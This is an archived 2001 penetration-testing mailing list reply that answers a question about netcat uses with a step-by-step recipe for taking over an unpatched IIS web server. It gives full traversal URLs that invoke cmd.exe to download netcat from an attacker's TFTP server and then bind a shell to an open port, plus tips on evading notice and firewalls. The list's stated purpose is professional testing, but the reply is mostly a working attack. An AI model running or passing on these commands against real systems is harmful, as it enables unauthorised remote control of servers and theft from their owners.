Penetration Testing mailing list archives
Re: Ideas on netcat
From: "Assess" <assess () cmsecurenet com>
Date: Mon, 27 Aug 2001 18:01:35 -0400
This is a simple way to take over an IIS web server without the unicode patch. It requires a firewall has TFTP outbound active and an inbound port available with nothing loaded on it. While several things must occur for this to work I have had it work twice out of ten assessments so the odds may still be good. You may want to rename nc.exe to something less obvious. Get Netcat from your tftp server http://VICTIMADDRESSHERE/scripts/..%255c../..%255c../..%255c../winnt/system3 2/cmd.exe?/c+tftp.exe+-i+TFTPSERVERADDRESSHERE+GET+nc.exe+c:\nc.exe Start netcat on port23 or any port that is open inbound, and unused, through the firewall. TCP port 53 works more often than not if DNS has been configured incorrectly. http://VICTIMADDRESS/scripts/..%255c../..%255c../..%255c../winnt/system32/cm d.exe?/c+nc%20-l%20-p%2023%20-t%20-e%20cmd.exe Telnet to the port on the target system. If it works you should have a c:\ prompt. ----- Original Message ----- From: "Vo0d0o" <voodooo () rediffmail com> To: <pen-test () securityfocus com> Sent: Friday, August 24, 2001 2:29 AM Subject: Ideas on netcat To all netcat gurus, I hav been experimentin on netcat for a few days and searchin almost everyday on netcat for some possible uses ,but in vain. As far as I know, no site is giving some other uses of netcat pertaining to pen-testing ...other than the usual *README* file which I find too basic. I would be grateful if anybody could throw some light on uses of netcat in pen-testing. Thanx in advance. Cheers, Kartik. ---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/ ---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
Current thread:
- Ideas on netcat Vo0d0o (Aug 27)
- Re: Ideas on netcat Assess (Aug 29)
- Re: Ideas on netcat Dave Aitel (Aug 29)
- Re: Ideas on netcat Penetration Testing (Aug 29)
- Re: Ideas on netcat Pawel Krawczyk (Aug 29)
- Re: Ideas on netcat BS (Aug 29)
- Re: Ideas on netcat Forrest Rae (Aug 29)
- Re: Ideas on netcat Jose Nazario (Aug 29)